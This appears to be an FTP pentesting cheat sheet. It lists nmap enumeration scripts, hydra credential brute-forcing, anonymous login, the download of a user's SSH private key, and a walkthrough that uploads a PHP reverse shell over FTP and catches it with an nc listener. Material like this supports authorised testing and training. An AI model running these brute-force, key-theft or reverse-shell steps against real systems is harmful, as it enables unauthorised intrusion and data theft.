FTP (File Transfer Protocol) Pentesting

Last modified: 2024-01-26

FTP is a standard communication protocol used for the transfer of computer files from a server to a client on a computer network. Default ports are 20 (for data), 21 (for control).

Enumeration

nmap --script ftp-anon -p 21 <target-ip>
nmap --script ftp-vuln* -p 21 <target-ip>
nmap --script ftp-* -p 21 <target-ip>

Brute Force Credentials

hydra -l username -P passwords.txt <target-ip> ftp
hydra -L username.txt -p password <target-ip> ftp

hydra -l username -P passwords.txt ftp://<target-ip>
hydra -L usernames.txt -p password ftp://<target-ip>

Investigation

nc <target-ip> 21

Using OpenSSL

First off, open listener.

nc -vn <target-ip> 21

Then run the command below.

openssl s_client -connect <target-ip>:21 -starttls ftp

Configuration Files

cat /etc/vsftpd.conf
cat /etc/vsftpd/vsftpd.conf

Connect

Using `ftp`

ftp <target-ip>
ftp <target-ip> <target-port>

Sometimes we might be able to the anonymous login.
Not likely, but worth a try.

ftp <target-ip>
username: anonymous
password: anonymous

Using `lftp`

lftp is the enhanced version of ftp. It's more easier to use than ftp.

lftp
lftp :-> connect
# or
lftp 10.0.0.1

# Login with username and password
lftp 10.0.0.1:-> login username password

Commands in FTP

After connecting FTP, we can search directories and files, then download them to your local machine, and put local files to the target system.
The FTP commands are almost the same as Linux commands.

ftp> pwd
ftp> cd
ftp> ls
# Print the content of the file
ftp> get example.txt -

# Switch to passive mode.
ftp> passive

# Print usage
ftp> ?

Download Files

To download files to local machine,

ftp> get example.txt
ftp> get home/user/.ssh/id_rsa ./id_rsa

# recursive
wget -r --user='username' --password='password' ftp://<target-ip>/sample

Upload Files

ftp> put example.txt

Reverse Shell over Website

If the target website allows users to access the ftp directory, we can upload the exploit for the reverse shell and get a shell.

Download the Payload

Get the payload for the reverse shell from this repository.

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php

# --------------------------------------------------------------------------------

# Edit some variables in shell.php
$ip = '<your-local-ip>';
$port = 1234;

Upload the Payload to FTP Directory

Connect to FTP and upload the payload.

ftp <target-ip>

# Upload the payload you downloaded
ftp> put shell.php

Get a Shell

At first, w need to open listener in your local machine.
```
nc -lvnp 1234
```
In a web browser, access to "http://vulnerable.com/path/to/ftp/shell.php".
We should get a target shell.

Start FTP Server

1. Install vsftpd

sudp apt install vsftpd

To check the config file for vsftpd, run the following command.

less /etc/vsftpd.conf

2. Start FTP Server

Below are commands for starting FTP server and checking the status.

sudo systemctl start vsftpd
sudo systemctl status vsftpd

If you’ve updated the config file, you need to restart vsftpd.

sudo systemctl restart vsftpd

FTP (File Transfer Protocol) Pentesting

Enumeration

Brute Force Credentials

Investigation

Banner Grabbing

Using OpenSSL

Configuration Files

Connect

Using `ftp`

Using `lftp`

Commands in FTP

Download Files

Upload Files

Reverse Shell over Website

Start FTP Server

1. Install vsftpd

2. Start FTP Server

ON THIS PAGE

Protocol

Port Forwarding

WiFi

Attack

Tool

VPN

Others

FTP (File Transfer Protocol) Pentesting

ON THIS PAGE